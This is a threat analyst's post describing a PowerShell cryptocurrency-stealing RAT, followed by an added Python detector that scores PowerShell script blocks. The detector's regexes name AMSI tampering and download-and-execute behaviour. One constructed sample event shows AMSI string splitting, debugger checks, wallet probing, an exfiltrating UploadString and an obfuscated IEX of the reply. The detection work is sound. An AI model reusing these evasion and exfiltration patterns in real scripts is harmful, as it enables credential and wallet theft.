Ali Chisom
Lagos
In-depth analysis of a highly obfuscated PowerShell-based infostealer I’ve classified as GhostWeaver RAT.

Over the past few days, I completed an in-depth analysis of a highly obfuscated PowerShell-based infostealer I’ve classified as GhostWeaver RAT.
The malware is financially motivated, stealth-focused, and built to evade detection in modern SOC environments. Its key characteristics:
• Heavy PowerShell obfuscation with native Windows API abuse
• AMSI bypass via in-memory protection manipulation
• Strong anti-analysis and anti-IR logic: execution is aborted if analysis tools such as x64dbg, Procmon or Wireshark are detected
• Full environment awareness (distinguishes WORKGROUP hosts from Active Directory domain members)
• Modular, C2-controlled loader: stages are retrieved over HTTP POST and executed in memory with iex (Invoke-Expression)
• Aggressive cryptocurrency wallet discovery, targeting:
– Browser wallets (MetaMask, Phantom, Trust, Coinbase, OKX, Rabby, etc.)
– Desktop wallets (Exodus, Electrum, Atomic, Monero, Sparrow, Daedalus, Bisq, more)
• Lightweight DGA-style domain rotation for C2 resilience
What makes this threat interesting isn’t nation-state sophistication — it’s efficiency:
• Speed over encryption
• Breadth over precision
• Evasion tuned specifically for analysts and sandboxes
Detection content produced alongside the analysis:
✔ Splunk hunting queries
✔ YARA rules
✔ Snort / Suricata signatures
✔ Sigma rules
✔ Microsoft Defender / Sentinel (KQL) detections
This is a strong example of how modern crimeware borrows red-team techniques, and why behavior-based detection matters more than signatures alone.
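The behavioural pattern described above (AMSI tampering, analysis-tool checks, domain reconnaissance, wallet discovery and a POST-then-iex loader) is easier to catch by scoring several weak indicators together than by matching any single string. The following Python is an added example, not the analyst's own tooling and not the Splunk/YARA/Sigma/KQL content mentioned above: it scores PowerShell script block text (as recorded by Script Block Logging, Event ID 4104) against behaviour families after undoing two common obfuscation tricks, backtick escapes and string-concatenation splitting. The regexes, weights, threshold and sample events are constructed assumptions for illustration; the sample events are not captured GhostWeaver artefacts.

```python
"""Behaviour-scoring detector over PowerShell script block text (Event ID 4104).

Added example. Assumes 4104 fragments have already been reassembled into whole
script blocks. All patterns, weights and sample events are illustrative.
"""
import re
from typing import Dict, List, Tuple

# Behaviour families: name -> (regex applied to normalised text, weight).
# Any one family can be benign; several in one block is the signal.
BEHAVIOURS: Dict[str, Tuple[str, int]] = {
    "obfuscation": (r"\[char\]\s*\d+|-join\b|-bxor\b|frombase64string", 2),
    "amsi_tamper": (r"amsiutils|amsiinitfailed|amsiscanbuffer|amsicontext", 4),
    "remote_exec": (
        r"(\biex\b|invoke-expression)[^\n]{0,200}(downloadstring|invoke-webrequest|invoke-restmethod|net\.webclient)"
        r"|(downloadstring|invoke-restmethod|net\.webclient)[^\n]{0,200}(\biex\b|invoke-expression)",
        4,
    ),
    "http_post": (r"-method\s+post\b|uploadstring|uploaddata", 2),
    "tool_check": (r"get-process[^\n]{0,150}(x64dbg|x32dbg|procmon|wireshark|ollydbg|ida64|fiddler|procexp)", 3),
    "domain_recon": (r"userdomain|partofdomain|\bworkgroup\b", 1),
    "wallet_discovery": (
        r"metamask|phantom|exodus|electrum|atomic wallet|monero|sparrow|daedalus|bisq|rabby|trust wallet|coinbase wallet",
        3,
    ),
}

ALERT_SCORE = 8  # assumed threshold; tune against your own baseline of admin scripts


def normalize(block: str) -> str:
    """Undo cheap obfuscation so family regexes see the intended tokens."""
    text = block.replace("`", "")              # I`E`X -> IEX
    text = re.sub(r"'\s*\+\s*'", "", text)    # 'Amsi'+'Utils' -> 'AmsiUtils'
    text = re.sub(r'"\s*\+\s*"', "", text)    # same for double-quoted pieces
    return text.lower()


def score_block(block: str) -> Tuple[int, List[str]]:
    """Return (total weight, matched family names) for one script block."""
    text = normalize(block)
    hits = [name for name, (pattern, _) in BEHAVIOURS.items() if re.search(pattern, text)]
    return sum(BEHAVIOURS[name][1] for name in hits), hits


def triage(events: List[Dict[str, str]], threshold: int = ALERT_SCORE) -> List[Dict[str, object]]:
    """Score every event and keep those at or above the threshold."""
    alerts = []
    for event in events:
        total, hits = score_block(event["script"])
        if total >= threshold:
            alerts.append({"id": event["id"], "score": total, "behaviours": hits})
    return alerts


# Constructed sample events (not real captures). The third mimics the described
# pattern: split AMSI string, debugger check, domain lookup, wallet probing,
# POST to C2, response handed to a backtick-obfuscated iex.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"id": "4104-0001", "script":
        "Get-Process | Where-Object { $_.CPU -gt 50 } | Sort-Object CPU -Descending | Select-Object -First 5"},
    {"id": "4104-0002", "script":
        "$cs = Get-WmiObject Win32_ComputerSystem; if ($cs.PartOfDomain) { Write-Host 'Domain joined' } else { Write-Host 'WORKGROUP' }"},
    {"id": "4104-0003", "script": """$t=[Ref].Assembly.GetType('System.Management.Automation.'+'Amsi'+'Utils');
if (Get-Process | ?{$_.Name -match 'x64dbg|procmon|wireshark'}) { exit };
$d=[Environment]::UserDomainName; $w=@('Exodus','Electrum','MetaMask') | %{ Test-Path (Join-Path $env:APPDATA $_) };
$r=(New-Object Net.WebClient).UploadString($u, ($d,$w -join ',')); I`E`X $r
"""},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Run it over reassembled 4104 script blocks exported from the SIEM. The threshold is deliberately set so that a lone domain check or a single Invoke-WebRequest does not fire while the combination does, and the normalisation step is what keeps the family match alive when a plain substring signature for AmsiUtils or iex would be defeated by string splitting or backtick interleaving.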
If you work in SOC, DFIR, Threat Hunting, or Malware Research, this is the kind of threat worth studying closely.
Happy to discuss tradecraft, detection strategies, or defensive blind spots 👇
Contact:
🌐 https://quantumkonetservices.tech
📞 09024676339
📧 contact@quantumkonetservices.tech
or
🌐 https://alichisom.com/
📧 contact@alichisom.com